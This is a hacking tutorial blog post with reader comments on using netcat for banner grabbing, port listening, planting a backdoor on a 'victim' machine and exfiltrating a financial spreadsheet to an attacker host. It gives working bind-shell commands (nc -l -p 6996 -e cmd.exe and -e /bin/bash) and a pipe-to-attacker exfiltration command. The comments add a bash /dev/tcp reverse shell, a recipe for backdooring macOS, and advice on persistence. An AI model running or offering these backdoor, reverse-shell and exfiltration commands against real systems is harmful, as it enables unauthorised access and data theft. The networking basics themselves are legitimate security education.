Hack Like a Pro: How to Use Netcat, the Swiss Army Knife of Hacking Tools

Welcome back, my greenhorn hackers!

For over 15 years, a tiny but powerful tool has been used by hackers for a wide range of activities. This tool goes by the name of netcat, and although well known in hacking circles, it's virtually unknown outside them. It's so powerful and useful that many people within the hacking community refer to it as the "Swiss Army knife of hacking tools."

In this tutorial, we'll look at the capabilities of this simple tool and how the aspiring hacker can use it.

What Is Netcat, Really?

Netcat, like so many hacker tools, was created to be a network analysis tool. It was written by a developer known only as "Hobbit," who gave it away to the IT community without compensation and has received scores of accolades for it. Thanks, Hobbit!

As such, you can use it to open up TCP and UDP connections between two machines over any port your heart desires. It can also be used as a port scanning tool, similar to nmap. In addition, it can be used for port forwarding, proxying, as a simple web server, and for leaving an open backdoor for the hacker.

Let's look at some of those capabilities using our BackTrack system.

Step 1: Open Netcat

Once we've fired up our BackTrack system and opened a terminal, we can use netcat from any directory, since it's installed in a bin directory that is in our PATH variable by default. So, let's type:

  • nc -h

As you can see, the basic syntax for netcat is the following.

To connect to another machine:

  • nc [options] host port

where host is an IP address or a hostname.

To listen for inbound connections:

  • nc -l -p port

That listener syntax belongs to the traditional netcat, which BackTrack ships. The OpenBSD rewrite that Kali and most current distributions install as nc takes the port directly (nc -l port), and some builds reject -l and -p together, so check nc -h before copying the commands below.

Step 2: Use Netcat to Connect to a Remote System

Let's use netcat to connect to a remote system. In this case, we will try to connect to a web server on port 80. We type:

  • nc 192.168.1.105 80

This gives us a TCP connection (the default; add -u for UDP) to the web server (port 80) at 192.168.1.105. Now, whatever we type will be sent directly to the web server when we hit Enter.

Step 3: Use Netcat to Banner Grab for OS Fingerprinting

Once we have a TCP connection to a web server, we can use netcat to grab the banner of the web server to identify what web serving software the victim is running. The banner rarely names the OS outright, but it narrows things down: IIS, for instance, only runs on Windows.

Remember that before attacking any system, we need to know as much as possible about the victim. Netcat can help us with that task by grabbing the banners that web servers serve up to new connections.

Now that we have a connection, we can do the banner grab to the web server by typing:

  • HEAD / HTTP/1.0

Be careful and copy exactly as I typed it, with the slashes and spaces.

Hit Enter twice. The first Enter ends the request line; the second sends the empty line that tells the server the request headers are finished, which is why typing the request and just waiting gets no reply. The web server will respond with its headers, including a Server line telling us what software it is running. In this case, we can see that the web server is running Microsoft's IIS 6.0. Keep in mind that this header is whatever the administrator chose to send; it can be stripped or faked, so treat it as a strong hint rather than proof.

We can use this technique on other public websites, as well. Let's try it on some widely known websites and see what web server software they're running. First, let's try this website, wonderhowto.com. When we ping wonderhowto.com, we see that its IP address (at the time of writing) is 98.129.110.26. So, we can then type:

  • nc 98.129.110.26 80

After getting a connection, we can grab the web server banner by typing:

  • HEAD / HTTP/1.0

And then hitting enter two or three times.

As we can see, wonderhowto.com is running Microsoft-IIS/7.5.

If we try the same thing with cnn.com, we get the results below.

Interestingly, cnn.com is running nginx, an open source web server that in a short time has grown to roughly match the number of Microsoft IIS installations worldwide (at the time of writing, Apache still serves over 60% of the web servers on the planet).

Go ahead and try it on other websites and find out what server they're running.
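A scripted version of Steps 2 and 3, added here as an example; it is not code from the original tutorial or from Hobbit's netcat. It assumes nc is on PATH and that the host you point it at is one you are permitted to test. The HTTP responses used to check the parser in this write-up are constructed samples, not real server output.

```bash
#!/usr/bin/env bash
# Added example, not from the original tutorial: a scripted banner grab
# (Steps 2 and 3) plus a parser for the Server header. Assumes nc is on PATH.
set -u

# The request the tutorial types by hand. HTTP/1.0 needs the header block
# terminated by an empty line (CRLF CRLF); that empty line is what the
# tutorial's "hit enter a few times" supplies. Host: keeps virtual-hosted
# servers from answering with a default site.
head_request() {
    printf 'HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n' "$1"
}

# Extract the Server: header from a raw HTTP response on stdin. Stops at
# the blank line that ends the headers, so text in the body is ignored.
# Prints nothing when the header is absent (stripped or never set).
server_header() {
    tr -d '\r' | awk '
        /^$/ { exit }
        tolower($1) == "server:" { sub(/^[^:]*:[ \t]*/, ""); print; exit }'
}

# Connect, send the request, report what came back. -w 5 gives up on a
# silent host after 5 seconds (traditional and OpenBSD nc both accept it).
banner_grab() {
    local host="$1" port="${2:-80}" banner
    banner=$(head_request "$host" | nc -w 5 "$host" "$port" | server_header)
    if [ -n "$banner" ]; then
        printf '%s:%s Server: %s\n' "$host" "$port" "$banner"
    else
        printf '%s:%s no Server header (stripped, or no HTTP reply)\n' "$host" "$port"
    fi
}

# Usage against a host you are authorised to test:  banner_grab 192.168.1.105 80
```

The parser deliberately stops at the end of the header block: a page body that happens to contain the text "Server:" is not a banner, and a server that strips the header returns nothing rather than a misleading value.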

Step 4: Use Netcat to Listen for Connections

Now, let's use netcat to create a listener on the remote system. Let's assume that we have a Windows server on which we have installed netcat. We can now type the following to open a netcat listener on port 6996 (it can be any port) on that system.

  • nc -l -p 6996

This has created a "listener" that we can connect to at our leisure. With the traditional netcat, the listener exits as soon as its first client disconnects. On Windows systems, we can run this same command with an upper case L (nc -L -p 6996) and the listener will re-open after each client disconnects, so we can come back to it repeatedly. It does not survive a reboot, though: nothing restarts netcat at boot unless we separately arrange for that.

Step 5: Create a Backdoor

Now let's create a backdoor on the victim system that we can come back to at any time. The command will vary slightly based upon whether we are attacking a Linux or Windows system.

For Windows we use:

  • nc -l -p 6996 -e cmd.exe

For Linux we use:

  • nc -l -p 6996 -e /bin/bash

This will open a listener on the system that will "pipe" the command shell or the Linux bash shell to the connecting system. The -e option exists in the traditional netcat and in Nmap's ncat (-e or --exec); the OpenBSD netcat deliberately left it out, so check nc -h on the target first. Bear in mind that this is an unauthenticated, unencrypted bind shell: anyone who finds the port gets the same shell we do. Then on our attacking system, we type:

  • nc 192.168.1.105 6996

As you can see, the Windows command prompt has been piped through our netcat connection directly to our attacking system! We own that box!

Step 6: Copy Files Out (Exfiltrate) from the Target

Netcat can also be used to exfiltrate files and data from the victim. Let's imagine that there's data on the victim system that we want. Maybe financial data or data stored in a database. We can use a stealth connection to slowly copy that data out to our attack system. In this example, we will exfiltrate a file called financialprojections.xls, presumably an Excel file with financial projections.

From the source system (Windows in this example; on Linux, cat takes the place of type), we type:

  • type financialprojections.xls | nc 192.168.1.104 6996

This command says: display the file financialprojections.xls and pipe (|) its bytes to netcat (nc), which sends them to IP address 192.168.1.104 on port 6996.

On the destination system, which must be started first so that the sender has something to connect to, we type:

  • nc -l -p 6996 > financialprojections.xls

This command says: create a listener (-l) on port (-p) 6996 and redirect the data received on this listener into a file named financialprojections.xls. Netcat gives no indication of whether the copy was complete, so compare a checksum of the two files afterwards; and if the sender hangs after the file has gone through, add -w 1 (or -q 1 on the traditional netcat) so that it closes once the connection goes idle.

We can see in the screenshot below that the file was copied across our netcat connection over port 6996 to our attacking machine!

This is just a small sample of what this powerful little program can do. When you combine it with some basic scripting skills, you can only imagine the incredible things it can do!

In future tutorials, we will look at other ways that this powerful little tool can help astute hackers, so keep coming back!

Original tech cat image via Shutterstock

31 Comments

Does this file transfer and everything only work if you have netcat installed on the remote computer? If so, how could you get it to install and then interact with it without using physical access, is there like a payload for it or something?

This is just nc. The question is, I'm at home and want to get on a computer miles away, but I can't break into the house. So how are you going to get nc on their machine so I could do this? (Not that I'm doing this; it's an analogy.) Thanks

Eight:

Good question! If you don't have physical access, you will need to upload it to the system. TFTP would be one option. If you were able to get a command prompt through Metasploit, you can upload netcat by TFTP.

OTW

Hi OTW,

Kindly advise on how I can use the Set-Cookie: 79.............path=/, HttpOnly

i have researched with no explicit clarification given.

Regards
evil genious

Evil:

I'm not sure what you are asking me and what this has to do with this tutorial on netcat?

OTW

OTW

I understand how XSS works. When I used netcat as described in this tutorial, I happened to come across this:

Set-Cookie: 79eE........................................................; path=/; HttpOnly
Connection; close

During my research on HttpOnly cookies, I know that they are the best in terms of security configuration (to avoid XSS). So if I manage to get the above, are they the cookies for the administrator, or are they part of the configuration to throw testers off?

I didn't want to try them since I am not a cracker.

evilgenious

Great writeup! Now to poke at your brain (in hopes of being pointed in the right direction) ;)

1) After netcat is installed as a backdoor on a system, how would a pentester configure the netcat backdoor to be used as a socks proxy?

2) Is it possible to chain netcat proxies together to use in succession?

3) If it's not possible to chain netcat proxies together through its own internal configs, could they be chained together using proxychains?

(I have a gut feeling that both scenarios are possible.)

4) Assuming that netcat can be chained, would the same configuration work in cryptcat?

Thank you in advance!

Yes, this can be done, but there are easier ways.

What would be an easier way?

Carlos, you might want to check out Socat. It's essentially netcat with a bunch of added crypto/tunneling gear.

I'd like to share that it is possible to get netcat working on Mac OS X too.

Though the default command "nc" emulates the legit netcat, the "-e" option is not available, so it's practically useless for backdooring.

This can be easily solved by installing it from "Homebrew".
Go to "brew.sh" and follow the instructions to install the terminal utility; once done, "brew install netcat".
Now you can run "netcat -l -p 1337 -e /bin/bash" and you'll get a shell on that system too.
It worked perfectly for me, but since there's no https or certs, feel free to not trust this.

Hello sir OTW. Is it possible to see the source code of netcat directly on Kali? On a more general note, is it possible to see the source code of installed tools or programs on Linux distros? If so, how? Thanks

King:

Nearly everything on our Kali platform is open source, including the Debian Linux it is built on.

OTW

That has been understood, but assuming I am without internet, can I see the source code directly somewhere in the OS?

For example, I cd to /usr/bin and try gedit netcat or some other tool, but nothing shows up. Well, those are files to be executed, but what about wanting to read the source, assuming I am without internet?

Is that possible? I hope I explained myself enough.
Thanks, Sir.

Those files are already compiled. You need the uncompiled files to view the source code.

OTW, I keep trying to use netcat to connect to the ftp server of some websites, like cnn, and things like that. I type HEAD / HTTP/1.O and nothing comes up. Am I doing something wrong?

Nevermind. I just have bad wifi.

How do I know what my friend's computer port is?

For the Linux bash shell we use: bash -i >& /dev/tcp/192.168.1.88/1234 0>&1
to send a connection. What about the Windows command shell? Help me here!

You create a listener in Windows with nc -L -p <port number> -e cmd.exe

So it must have netcat? No other way?

Sadly, Windows doesn't come with many useful CLI tools. You can download netcat here and most others here.

I'm sure there are other ways, but this article is about using netcat.

I am a newbie and love the knowledge shared here on this site. I need help with an issue I have had happen, similar to this current hack, but it was done to me on my rooted Samsung Galaxy S4. Any advice or suggestions on how to retaliate or something? Thanks

Would it be possible to upload a Meterpreter payload to a nc listener, and if so, how? I tried a few things and it spewed out gibberish... Thanks

Robyn

OTW, how would you make this connection persistent on a Linux server?

I guess this can easily be achieved with nohup

What is the difference between ncat and netcat?
ncat -h gives me different parameters compared to netcat -h.

Please help me clear up my concept! Thank you! Otherwise, your tutorial is, as always, super awesome! Thank you, Master OTW, for sharing such useful information!

One more doubt of mine is, can we transfer an .exe file through ncat?

When I get netcat installed on a target system, what are my options from there? Can I open a Meterpreter session through this?
